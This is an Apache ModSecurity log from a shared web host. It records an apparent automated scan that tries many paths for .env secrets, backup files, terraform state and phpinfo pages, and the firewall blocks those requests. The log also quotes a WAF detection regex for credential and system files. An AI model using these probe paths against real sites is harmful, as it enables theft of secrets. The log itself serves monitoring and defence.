[Tue May 26 13:39:44.090724 2026] [security2:error] [pid 544395:tid 544592] [client 45.148.10.95:9768] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/nodeapi/.env"] [unique_id "ahVVSBmrs7g3RMCdp8XKcgAAAEM"]
[Tue May 26 13:39:44.107950 2026] [security2:error] [pid 544395:tid 544599] [client 45.148.10.95:39874] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/nodeweb/.env"] [unique_id "ahVVSBmrs7g3RMCdp8XKdQAAAEo"]
[Tue May 26 13:39:44.134365 2026] [security2:error] [pid 536875:tid 537089] [client 45.148.10.95:9696] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/old/.env"] [unique_id "ahVVSOr_-FTveSGlx1HrpwAAANk"]
[Tue May 26 13:39:44.140199 2026] [security2:error] [pid 536875:tid 537066] [client 45.148.10.95:39892] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/opt/.env"] [unique_id "ahVVSOr_-FTveSGlx1HrqAAAAMI"]
[Tue May 26 13:39:44.317795 2026] [security2:error] [pid 536875:tid 537090] [client 45.148.10.95:40004] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/php-info.php"] [unique_id "ahVVSOr_-FTveSGlx1HrswAAANo"]
[Tue May 26 13:39:44.336522 2026] [security2:error] [pid 544395:tid 544625] [client 45.148.10.95:9760] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/php.php"] [unique_id "ahVVSBmrs7g3RMCdp8XKhQAAAGQ"]
[Tue May 26 13:39:44.340679 2026] [security2:error] [pid 536875:tid 537062] [client 45.148.10.95:39990] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/php_info.php"] [unique_id "ahVVSOr_-FTveSGlx1HrtwAAAL4"]
[Tue May 26 13:39:44.379648 2026] [security2:error] [pid 544395:tid 544616] [client 45.148.10.95:39882] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/phpinfo.php"] [unique_id "ahVVSBmrs7g3RMCdp8XKiAAAAFs"]
[Tue May 26 13:39:44.391397 2026] [security2:error] [pid 544395:tid 544564] [client 45.148.10.95:9768] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/portal/.env"] [unique_id "ahVVSBmrs7g3RMCdp8XKiQAAACc"]
[Tue May 26 13:39:44.407918 2026] [security2:error] [pid 544395:tid 544650] [client 45.148.10.95:39874] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/prod/.env"] [unique_id "ahVVSBmrs7g3RMCdp8XKjAAAAH0"]
[Tue May 26 13:39:44.434026 2026] [security2:error] [pid 536875:tid 537051] [client 45.148.10.95:9696] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/product/.env"] [unique_id "ahVVSOr_-FTveSGlx1HrvAAAALM"]
[Tue May 26 13:39:44.435375 2026] [security2:error] [pid 536875:tid 537035] [client 45.148.10.95:39892] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/production/.env"] [unique_id "ahVVSOr_-FTveSGlx1HrvQAAAKM"]
[Tue May 26 13:39:44.465925 2026] [security2:error] [pid 536875:tid 537094] [client 45.148.10.95:40006] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/project/.env"] [unique_id "ahVVSOr_-FTveSGlx1HrvgAAAN4"]
[Tue May 26 13:39:44.481969 2026] [security2:error] [pid 536875:tid 537098] [client 45.148.10.95:39998] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/public-api/.env"] [unique_id "ahVVSOr_-FTveSGlx1HrwAAAAOI"]
[Tue May 26 13:39:44.486200 2026] [security2:error] [pid 544395:tid 544580] [client 45.148.10.95:9700] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/public/.env"] [unique_id "ahVVSBmrs7g3RMCdp8XKjwAAADc"]
[Tue May 26 13:39:44.502658 2026] [security2:error] [pid 536875:tid 537087] [client 45.148.10.95:9782] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/public/phpinfo.php"] [unique_id "ahVVSOr_-FTveSGlx1HrwQAAANc"]
[Tue May 26 13:39:44.526692 2026] [security2:error] [pid 544395:tid 544528] [client 45.148.10.95:39910] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/public_html/.env"] [unique_id "ahVVSBmrs7g3RMCdp8XKkAAAAAM"]
[Tue May 26 13:39:44.550171 2026] [security2:error] [pid 544395:tid 544651] [client 45.148.10.95:39864] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/qa/.env"] [unique_id "ahVVSBmrs7g3RMCdp8XKkgAAAH4"]
[Tue May 26 13:39:44.847542 2026] [security2:error] [pid 544395:tid 544535] [client 45.148.10.95:39864] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/s3/.env.bak"] [unique_id "ahVVSBmrs7g3RMCdp8XKpAAAAAo"]
[Tue May 26 13:39:44.933256 2026] [security2:error] [pid 544395:tid 544541] [client 45.148.10.95:9700] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/server/api/.env"] [unique_id "ahVVSBmrs7g3RMCdp8XKqQAAABA"]
[Tue May 26 13:39:44.933770 2026] [security2:error] [pid 536875:tid 537013] [client 45.148.10.95:40022] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/server/.env"] [unique_id "ahVVSOr_-FTveSGlx1Hr3wAAAI0"]
[Tue May 26 13:39:44.967970 2026] [security2:error] [pid 544395:tid 544627] [client 45.148.10.95:39910] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/server/backend/.env"] [unique_id "ahVVSBmrs7g3RMCdp8XKqgAAAGY"]
[Tue May 26 13:39:45.066106 2026] [security2:error] [pid 536875:tid 537008] [client 45.148.10.95:39998] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/services/.env"] [unique_id "ahVVSer_-FTveSGlx1Hr5gAAAIg"]
[Tue May 26 13:39:45.070539 2026] [security2:error] [pid 544395:tid 544526] [client 45.148.10.95:39920] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/service/.env"] [unique_id "ahVVSRmrs7g3RMCdp8XKsAAAAAE"]
[Tue May 26 13:39:45.143422 2026] [security2:error] [pid 544395:tid 544534] [client 45.148.10.95:39864] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/shared/.env"] [unique_id "ahVVSRmrs7g3RMCdp8XKswAAAAk"]
[Tue May 26 13:39:45.145483 2026] [security2:error] [pid 544395:tid 544596] [client 45.148.10.95:39900] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/shop/.env"] [unique_id "ahVVSRmrs7g3RMCdp8XKtQAAAEc"]
[Tue May 26 13:39:45.212489 2026] [security2:error] [pid 536875:tid 537114] [client 45.148.10.95:40006] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/src/.env"] [unique_id "ahVVSer_-FTveSGlx1Hr7wAAAPI"]
[Tue May 26 13:39:45.322998 2026] [security2:error] [pid 544395:tid 544632] [client 45.148.10.95:40026] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/srv/.env"] [unique_id "ahVVSRmrs7g3RMCdp8XKwwAAAGs"]
[Tue May 26 13:39:45.329564 2026] [security2:error] [pid 536875:tid 537053] [client 45.148.10.95:39892] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/stage/.env"] [unique_id "ahVVSer_-FTveSGlx1Hr9gAAALU"]
[Tue May 26 13:39:45.338357 2026] [security2:error] [pid 536875:tid 537027] [client 45.148.10.95:9696] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/staging/.env"] [unique_id "ahVVSer_-FTveSGlx1Hr-AAAAJs"]
[Tue May 26 13:39:45.382475 2026] [security2:error] [pid 544395:tid 544613] [client 45.148.10.95:9700] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/stg/.env"] [unique_id "ahVVSRmrs7g3RMCdp8XKyQAAAFg"]
[Tue May 26 13:39:45.449956 2026] [security2:error] [pid 544395:tid 544601] [client 45.148.10.95:9768] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/stripe/.env"] [unique_id "ahVVSRmrs7g3RMCdp8XKzQAAAEw"]
[Tue May 26 13:39:45.476957 2026] [cgid:error] [pid 536875:tid 537005] [client 45.148.10.95:39892] AH01264: stderr from /home2/whitece9/public_html/sysinfo.cgi: script not found or unable to stat
[Tue May 26 13:39:45.509916 2026] [security2:error] [pid 536875:tid 537007] [client 45.148.10.95:40006] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/terraform.tfstate.backup"] [unique_id "ahVVSer_-FTveSGlx1HsBAAAAIc"]
[Tue May 26 13:39:45.556370 2026] [security2:error] [pid 544395:tid 544533] [client 45.148.10.95:39910] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/test.php"] [unique_id "ahVVSRmrs7g3RMCdp8XK0gAAAAg"]
[Tue May 26 13:39:45.564476 2026] [security2:error] [pid 536875:tid 537071] [client 45.148.10.95:39974] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/test/.env"] [unique_id "ahVVSer_-FTveSGlx1HsBwAAAMc"]
[Tue May 26 13:39:45.599678 2026] [security2:error] [pid 544395:tid 544595] [client 45.148.10.95:9768] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/user/.env"] [unique_id "ahVVSRmrs7g3RMCdp8XK1wAAAEY"]
[Tue May 26 13:39:45.616433 2026] [security2:error] [pid 544395:tid 544529] [client 45.148.10.95:40026] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/v1/.env"] [unique_id "ahVVSRmrs7g3RMCdp8XK2AAAAAQ"]
[Tue May 26 13:39:45.638384 2026] [security2:error] [pid 536875:tid 537100] [client 45.148.10.95:9696] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/v2/.env"] [unique_id "ahVVSer_-FTveSGlx1HsCgAAAOQ"]
[Tue May 26 13:39:45.654757 2026] [security2:error] [pid 536875:tid 537117] [client 45.148.10.95:9716] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/v3/.env"] [unique_id "ahVVSer_-FTveSGlx1HsDAAAAPU"]
[Tue May 26 13:39:45.712646 2026] [security2:error] [pid 536875:tid 537099] [client 172.86.76.182:63628] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 182.76.86.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVVSer_-FTveSGlx1Hr_wAAAOM"], referer: https://www.cagmedya.com/gizlilik-ve-guvenlik-politikasi/
[Tue May 26 13:39:45.712856 2026] [security2:error] [pid 536875:tid 537099] [client 172.86.76.182:63628] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVVSer_-FTveSGlx1Hr_wAAAOM"], referer: https://www.cagmedya.com/gizlilik-ve-guvenlik-politikasi/
[Tue May 26 13:39:45.785527 2026] [security2:error] [pid 544395:tid 544567] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVSRmrs7g3RMCdp8XKxwAAACo"]
